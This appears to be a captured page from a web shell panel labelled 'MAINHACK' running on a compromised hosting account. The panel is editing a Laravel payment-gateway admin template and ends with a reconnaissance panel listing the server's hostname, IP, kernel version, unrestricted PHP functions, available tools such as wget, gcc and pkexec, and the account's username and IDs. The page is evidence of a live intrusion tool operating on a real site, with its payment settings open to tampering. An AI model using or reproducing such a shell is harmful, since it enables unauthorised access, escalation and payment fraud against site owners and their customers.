[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 0098593d674b6f6f7b072e463170b79e.php
<?php $__env->startSection('content'); ?> <div class="row"> <div class="col-lg-8 offset-lg-2"> <div class="card"> <div class="card-header"> <span class="panel-title"><?php echo e(_lang('Update Payment Gateway')); ?></span> </div> <div class="card-body"> <form method="post" class="validate" autocomplete="off" action="<?php echo e(route('payment_gateways.update', $id)); ?>" enctype="multipart/form-data"> <?php echo e(csrf_field()); ?> <input name="_method" type="hidden" value="PATCH"> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Name')); ?></label> <div class="col-xl-9"> <input type="text" class="form-control" value="<?php echo e($paymentgateway->name); ?>" readonly> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Status')); ?></label> <div class="col-xl-9"> <select class="form-control auto-select" data-selected="<?php echo e($paymentgateway->status); ?>" name="status" id="gateway_status" required> <option value="0"><?php echo e(_lang('Disable')); ?></option> <option value="1"><?php echo e(_lang('Enable')); ?></option> </select> </div> </div> <div class="row"> <div class="col-md-12"> <?php $__currentLoopData = $paymentgateway->parameters; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php if($key != 'environment'): ?> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(strtoupper(str_replace('_',' ',$key))); ?></label> <div class="col-xl-9"> <input type="text" class="form-control" value="<?php echo e($value); ?>" name="parameter_value[<?php echo e($key); ?>]"> </div> </div> <?php else: ?> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(strtoupper(str_replace('_',' ',$key))); ?></label> <div class="col-xl-9"> <select class="form-control auto-select" data-selected="<?php echo e($value); ?>" name="parameter_value[<?php echo e($key); ?>]"> <option value="sandbox"><?php echo e(_lang('Sandbox')); ?></option> <option value="live"><?php echo e(_lang('Live')); ?></option> </select> </div> </div> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <div class="form-group row"> <div class="col-xl-9 offset-xl-3"> <button type="submit" class="btn btn-primary"><i class="ti-check-box mr-2"></i><?php echo e(_lang('Save Changes')); ?></button> </div> </div> </div> </div> </form> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php $__env->startSection('js-script'); ?> <script> (function ($) { "use strict"; <?php if($paymentgateway->is_crypto == 0): ?> $('#gateway_currency').val() != '' ? $(".gateway_currency_preview").html($('#gateway_currency').val()) : ''; $(document).on('change','#gateway_currency', function(){ $(".gateway_currency_preview").html($(this).val()); }); <?php endif; ?> })(jQuery); </script> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/public_html/resources/views/backend/admin/payment_gateway/edit.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.79 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002